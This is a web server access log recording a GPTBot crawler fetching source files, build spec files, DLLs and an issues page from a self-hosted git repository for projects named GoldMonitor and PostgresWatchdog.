"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:17:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12611] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17436] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:17:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:17:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12612] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:17:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" -[17/Feb/2026:17:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:17:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:17:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:17:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:17:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:17:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12641] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17437] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:17:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:17:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py?display=source" [Client 74.7.227.38] [Length 30164] [Gzip 8.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:17:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:17:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17128] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:17:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:17:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17095] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:17:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:17:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:17:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:17:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr 